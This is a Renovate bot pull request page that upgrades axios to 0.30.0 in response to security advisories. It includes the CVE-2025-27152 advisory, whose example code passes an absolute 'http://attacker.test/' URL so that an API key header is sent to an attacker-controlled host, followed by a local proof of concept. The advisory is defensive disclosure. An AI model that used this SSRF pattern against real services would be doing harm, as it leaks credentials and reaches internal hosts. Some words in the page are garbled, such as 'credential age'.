Conversation

renovate[bot]

This PR contains the following updates:

PackageChangeAgeAdoptionPassingConfidence
axios (source)0.21.4 -> 0.30.0ageadoptionpassingconfidence

Warning

Some dependencies could not be looked up. Check the Dependency Dasard for more information.

Vulnerability Alerts

CVE-2023-45857

An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.

CVE-2024-39338

axios 1.7.2 allows SSRF via unexpected behavior where requests for path relative URLs get processed as protocol relative URLs.

CVE-2025-27152

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential age. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

  • When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
  • Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

  1. Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
  1. Create a script (e.g., main.js):
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
  1. Run the script:
$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

  • Credential age: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  • Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

Release Notes

axios/axios (axios)

v0.30.0

Compare Source

v0.29.0

Compare Source

Release notes:

Bug Fixes
Contributors to this release

v0.28.1

Compare Source

Release notes:

Release notes:

Bug Fixes
  • fix(backport): custom params serializer support (#​6263)
  • fix(backport): uncaught ReferenceError req is not defined (#​6307)

v0.28.0

Compare Source

Release notes:

Bug Fixes
Backports from v1.x:
  • Allow null indexes on formSerializer and paramsSerializer v0.x (#​4961)
  • Fixing content-type header repeated #​4745
  • Fixed timeout error message for HTTP 4738
  • Added axios.formToJSON method (#​4735)
  • URL params serializer (#​4734)
  • Fixed toFormData Blob issue on node>v17 #​4728
  • Adding types for progress event callbacks #​4675
  • Fixed max body length defaults #​4731
  • Added data URL support for node.js (#​4725)
  • Added isCancel type assert (#​4293)
  • Added the ability for the url-encoded-form serializer to respect the formSerializer config (#​4721)
  • Add string[] to AxiosRequestHeaders type (#​4322)
  • Allow type definition for axios instance methods (#​4224)
  • Fixed AxiosError stack capturing; (#​4718)
  • Fixed AxiosError status code type; (#​4717)
  • Adding Canceler parameters config and request (#​4711)
  • fix(types): allow to specify partial default headers for instance creation (#​4185)
  • Added blob to the list of protocols supported by the browser (#​4678)
  • Fixing Z_BUF_ERROR when no content (#​4701)
  • Fixed race condition on immediate requests cancellation (#​4261)
  • Added a clear() function to the request and response interceptors object so a user can ensure that all interceptors have been removed from an Axios instance https://.com/axios/axios/pull/4248
  • Added generic AxiosAbortSignal TS interface to avoid importing AbortController polyfill (#​4229)
  • Fix TS definition for AxiosRequestTransformer (#​4201)
  • Use type alias instead of interface for AxiosPromise (#​4505)
  • Include request and config when creating a CanceledError instance (#​4659)
  • Added generic TS types for the exposed toFormData helper (#​4668)
  • Optimized the code that checks cancellation (#​4587)
  • Replaced webpack with rollup (#​4596)
  • Added stack trace to AxiosError (#​4624)
  • Updated AxiosError.config to be optional in the type definition (#​4665)
  • Removed incorrect argument for NetworkError constructor (#​4656)

v0.27.2

Compare Source

Fixes and Functionality:

  • Fixed FormData posting in browser environment by reverting #​3785 (#​4640)
  • Enhanced protocol parsing implementation (#​4639)
  • Fixed bundle size

v0.27.1

Compare Source

Fixes and Functionality:
  • Removed import of url module in browser build due to huge size overhead and builds being broken (#​4594)
  • Bumped follow-redirects to ^1.14.9 (#​4615)

v0.27.0

Compare Source

Breaking changes:
  • New toFormData helper function that allows the implementor to pass an object and allow axios to convert it to FormData (#​3757)
  • Removed functionality that removed the the Content-Type request header when passing FormData (#​3785)
  • (*) Refactored error handling implementing AxiosError as a constructor, this is a large change to error handling on the whole (#​3645)
  • Separated responsibility for FormData instantiation between transformRequest and toFormData (#​4470)
  • (*) Improved and fixed multiple issues with FormData support (#​4448)
QOL and DevX improvements:
  • Added a multipart/form-data testing playground allowing contributors to debug changes easily (#​4465)
Fixes and Functionality:
  • Refactored project file structure to avoid circular imports (#​4515) & (#​4516)
  • Bumped follow-redirects to ^1.14.9 (#​4562)
Internal and Tests:
  • Updated dev dependencies to latest version
Documentation:
  • Fixing incorrect link in changelog (#​4551)
Notes:
  • (*) Please read these pull requests before updating, these changes are very impactful and far reaching.

v0.26.1

Compare Source

Fixes and Functionality:
  • Refactored project file structure to avoid circular imports (#​4220)

v0.26.0

Compare Source

Fixes and Functionality:
  • Fixed The timeoutErrorMessage property in config not work with Node.js (#​3581)
  • Added errors to be displayed when the query parsing process itself fails (#​3961)
  • Fix/remove url required (#​4426)
  • Update follow-redirects dependency due to Vulnerability (#​4462)
  • Bump karma from 6.3.11 to 6.3.14 (#​4461)
  • Bump follow-redirects from 1.14.7 to 1.14.8 (#​4473)

v0.25.0

Compare Source

Breaking changes:
  • Fixing maxBodyLength enforcement (#​3786)
  • Don't rely on strict mode behaviour for arguments (#​3470)
  • Adding error handling when missing url (#​3791)
  • Update isAbsoluteURL.js removing escaping of non-special characters (#​3809)
  • Use native Array.isArray() in utils.js (#​3836)
  • Adding error handling inside stream end callback (#​3967)
Fixes and Functionality:
  • Added aborted even handler (#​3916)
  • Header types expanded allowing boolean and number types (#​4144)
  • Fix cancel signature allowing cancel message to be undefined (#​3153)
  • Updated type checks to be formulated better (#​3342)
  • Avoid unnecessary buffer allocations (#​3321)
  • Adding a socket handler to keep TCP connection live when processing long living requests (#​3422)
  • Added toFormData helper function (#​3757)
  • Adding responseEncoding prop type in AxiosRequestConfig (#​3918)
Internal and Tests:
  • Adding axios-test-instance to ecosystem (#​3786)
  • Optimize the logic of isAxiosError (#​3546)
  • Add tests and documentation to display how multiple inceptors work (#​3564)
  • Updating follow-redirects to version 1.14.7 (#​4379)
Documentation:
  • Fixing changelog to show corrext pull request (#​4219)
  • Update upgrade guide for https proxy setting (#​3604)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on :

v0.24.0

Compare Source

Breaking changes:
  • Revert: change type of AxiosResponse to any, please read lengthy discussion here: (#​4141) pull request: (#​4186)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on :

v0.23.0

Compare Source

Breaking changes:
  • Distinguish request and response data types (#​4116)
  • Change never type to unknown (#​4142)
  • Fixed TransitionalOptions typings (#​4147)
Fixes and Functionality:
  • Adding globalObject: 'this' to webpack config (#​3176)
  • Adding insecureHTTPParser type to AxiosRequestConfig (#​4066)
  • Fix missing semicolon in typings (#​4115)
  • Fix response headers types (#​4136)
Internal and Tests:
  • Improve timeout error when timeout is browser default (#​3209)
  • Fix node version on CI (#​4069)
  • Added testing to TypeScript portion of project (#​4140)
Documentation:

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on :

v0.22.0

Compare Source

Fixes and Functionality:
  • Caseless header comparing in HTTP adapter (#​2880)
  • Avoid package.json import fixing issues and warnings related to this (#​4041), (#​4065)
  • Fixed cancelToken age and added AbortController support (#​3305)
  • Updating CI to run on release branches
  • Bump follow redirects version
  • Fixed default transitional config for custom Axios instance; (#​4052)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on :

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovateRenovate

Branch automerge failure

This PR was configured for branch automerge. However, this is not possible, so it has been raised as a PR instead.

  • Branch has one or more failed status checks

@renovaterenovate bot force-pushed the renovate/npm-axios-vulnerability branch 2 times, most recently from db9d830 to 9e5d51d Compare February 21, 2024 13:26
@renovaterenovate bot force-pushed the renovate/npm-axios-vulnerability branch from 9e5d51d to 8295b31 Compare August 6, 2024 08:09
@renovaterenovate bot changed the title fix(deps): update dependency axios to v0.28.0 [security] fix(deps): update dependency axios to v1 [security] Aug 6, 2024
@renovaterenovate bot force-pushed the renovate/npm-axios-vulnerability branch from 8295b31 to 6a7428f Compare August 13, 2024 20:37
@renovaterenovate bot force-pushed the renovate/npm-axios-vulnerability branch from 6a7428f to 961760c Compare March 7, 2025 18:45
@renovaterenovate bot force-pushed the renovate/npm-axios-vulnerability branch from 961760c to 1b96bb2 Compare March 28, 2025 15:52
@renovaterenovate bot changed the title fix(deps): update dependency axios to v1 [security] fix(deps): update dependency axios to v0.30.0 [security] Mar 28, 2025
Sign up for free to join this conversation on . Already have an account? Sign in to comment
No reviews
No one assigned
None yet
None yet
No milestone

Successfully merging this pull request may close these issues.